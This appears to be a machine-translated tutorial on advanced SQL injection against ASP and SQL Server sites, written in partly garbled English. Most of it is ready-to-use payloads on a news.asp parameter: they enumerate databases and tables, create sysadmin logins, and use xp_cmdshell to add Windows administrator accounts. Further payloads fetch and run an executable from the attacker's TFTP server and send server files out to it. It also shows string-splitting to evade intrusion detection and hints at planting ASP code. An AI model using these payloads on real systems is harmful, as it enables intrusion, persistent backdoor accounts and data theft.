Now, I will inject senior skills to support the senior skills to support the veterans: Preface: That is, the basic injection method is not detailed. I don't understand that I can check the injecting basic article. In order to better use good injection, it is recommended to see the SQL grammar related articles in this site [Get all database name] select name from master.dbo.sdatabases where dbid = 7 // DBID value is 7 or more is user database [ Get a data table name] [Update the field value as a table name, then you can get the table name] Select Top 1 name from database name .dbo.sysObjects where xtype = 'u' and status> 0 and Name Not In ('Table') [Get Data Table Field Name] [Update the field value as the field name, then you can get the value of this field to get the field name] SELECT TOP 1 Database name .dbo.col_name (Object_ID) 'To query the data table name'), the field list, such as: 1) [WHERE Condition] Take the vulnerability to build a database administrator account and system administrator account via SQLServer account [Current account must be sysadmin group] news.asp? Id = 2; EXEC MASTER.DBO.SP_ADDLOGIN TEST, TEST; - / / Add Database User User Test, Password is Testnews.asp? ID = 2; Exec Master.dbo.sp_password Test, 123456, Test; - // If you want to change your password , Use this sentence (change Test's password to 123456) news.asp? Id = 2; exec master.dbo.sp_addsrvrolemember test, sysadmin; - // Add Test to the sysadmin group, member of this group can execute any Operation news.asp? Id = 2; exec master.dbo.xp_cmdshell 'net user test test / add'; - // Add system user TEST, password is testnews.asp? Id = 2; exec master.dbo.xp_cmdshell ' Net localgroup administrators test / add '; - // Put the system user Test to the administrator, you have left the Test administrator account in his database and system. Here is how to download file file from your player. EXE running it [Prerequisites You must set your computer to the TFTP server, open the 69-port] ID = 2; exec master.dbo.xp_cmdshell 'tftp -i Your IP get file.exe '; - then run this file: ID = 2; exec master.dbo.xp_cmdshell' file.exe '; - Download the server file file2.doc to local TFTP server [file must exist] : id = 2; exec master.dbo.xp_cmdshell 'tftp -i Your ip Put file2.doc'; - Repeat of the IDS [Use Variable] Declare @a sysname set @ a = 'xp _' 'cmdshell' Exec @a 'DIR C: /' DECLARE @A sysname set @ a = 'xp' '_ cm' 'dshell' exec @a 'DIR C: /' new: built a table. There is only one field, the type is image, written to the contents of the ASP.
